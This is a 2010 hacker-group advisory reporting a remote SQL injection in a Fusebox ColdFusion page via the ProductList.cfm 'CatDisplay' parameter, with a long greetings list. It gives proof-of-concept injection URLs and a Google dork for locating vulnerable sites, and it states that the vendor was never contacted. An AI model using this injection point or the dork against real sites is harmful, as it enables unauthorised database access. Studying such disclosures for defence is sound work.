151 lines
No EOL
3.1 KiB
Text
151 lines
No EOL
3.1 KiB
Text
-----------------------------------------------------------------------------------------
|
|
[AJS_ADVISORIES_01&2010]
|
|
fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability
|
|
-----------------------------------------------------------------------------------------
|
|
|
|
Author
|
|
: Shamus
|
|
Date : May, 29 th 2010
|
|
Location : Solo
|
|
&& Jogjakarta, Indonesia
|
|
Web :
|
|
http://antijasakom.org/forum
|
|
Critical Lvl : Moderate
|
|
Impact :
|
|
-
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
|
|
Affected
|
|
software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application :
|
|
-
|
|
version : -
|
|
Vendor : http://www.fusebox.org/
|
|
download
|
|
: http://www.fusebox.org/go/getting-started/downloading-fusebox
|
|
Description
|
|
: Fusebox is the most popular framework for building ColdFusion and PHP
|
|
web applications.
|
|
"Fuseboxers" find that the framework releases
|
|
them from much of the drudgery of writing applications and enables them
|
|
to focus their efforts on creating great, customer-focused software.
|
|
--------------------------------------------------------------------------
|
|
|
|
|
|
|
|
Vulnerability:
|
|
~~~~~~~~~~~~
|
|
-
|
|
|
|
PoC/Exploit
|
|
:
|
|
~~~~~~~~~~
|
|
|
|
http://127.0.0.1/ProductList.cfm?CatDisplay=1%27[SQL
|
|
query]
|
|
http://127.0.0.1/[path]/ProductList.cfm?CatDisplay=1%27[SQL
|
|
query]
|
|
|
|
|
|
Dork:
|
|
~~~~~
|
|
Google : ProductList.cfm?CatDisplay
|
|
|
|
|
|
Solution:
|
|
~~~~~
|
|
-
|
|
N/A.
|
|
|
|
|
|
Timeline:
|
|
~~~~~~~
|
|
|
|
- 25 - 05 - 2010 bug found
|
|
-
|
|
29 - 05 - 2010 no vendor contacted
|
|
- 29 - 05 - 2010 advisory release
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
|
|
Shoutz:
|
|
~~~~~~~
|
|
|
|
oO0:::::
|
|
Greetz and Thanks: :::::0Oo.
|
|
Tuhan YME
|
|
My Parents
|
|
SPYRO_KiD
|
|
K-159
|
|
lirva32
|
|
newbie_campuz
|
|
|
|
And
|
|
Also My LuvLy :
|
|
..::.E.Z.R (The deepest Love I'v ever had..).::..
|
|
|
|
in
|
|
memorial :
|
|
1. Monique
|
|
2. Dewi S.
|
|
3. W. Devi Amelia
|
|
4. S.
|
|
Anna
|
|
|
|
oO0:::A hearthy handshake to: :::0Oo
|
|
~ Crack SKY Staff
|
|
~
|
|
Echo staff
|
|
~ antijasakom staff
|
|
~ jatimcrew staff
|
|
~ whitecyber
|
|
staff
|
|
~ lumajangcrew staff
|
|
~ unix_dbuger, boys_rvn1609, jaqk,
|
|
byz9991, bius, g4pt3k, anharku, wandi, 5yn_4ck, kiddies, bom2, untouch
|
|
~
|
|
arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci,
|
|
x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber,
|
|
kucinghitam, black_samuraixxx, ucrit_penyu, wendys182, cybermuttaqin
|
|
~
|
|
k3nz0, thomas_ipt2007, blackpaper, nakuragen, candra
|
|
~ whitehat,
|
|
wenkhairu, Agoes_doubleb, diki, lumajangcrew a.k.a adwisatya a.k.a
|
|
xyberbreaker, wahyu_antijasakom
|
|
~ Cruz3N, mywisdom,flyff666,
|
|
gunslinger_, ketek, chaer.newbie, petimati, gonzhack, spykit, xtr0nic,
|
|
N4ck0, assadotcom, Qrembiezs, d4y4x
|
|
~ All people in SMAN 3
|
|
~ All
|
|
members of spyrozone
|
|
~ All members of echo
|
|
~ All members of
|
|
newhack
|
|
~ All members of jatimcrew
|
|
~ All members of Anti-Jasakom
|
|
~
|
|
All members of whitecyber
|
|
~ All members of Devilzc0de
|
|
#e-c-h-o,
|
|
#K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding,
|
|
#jatimcrew, #antijasakom, #whitecyber, #devilzc0de
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
|
|
Contact:
|
|
~~~~~~~~~
|
|
|
|
Shamus
|
|
: Shamus@antijasakom.org
|
|
Homepage:
|
|
http://antijasakom.org/forum/viewtopic.php?f=38&t=600
|
|
|
|
--------------------------------
|
|
[ EOF ] ---------------------------------- |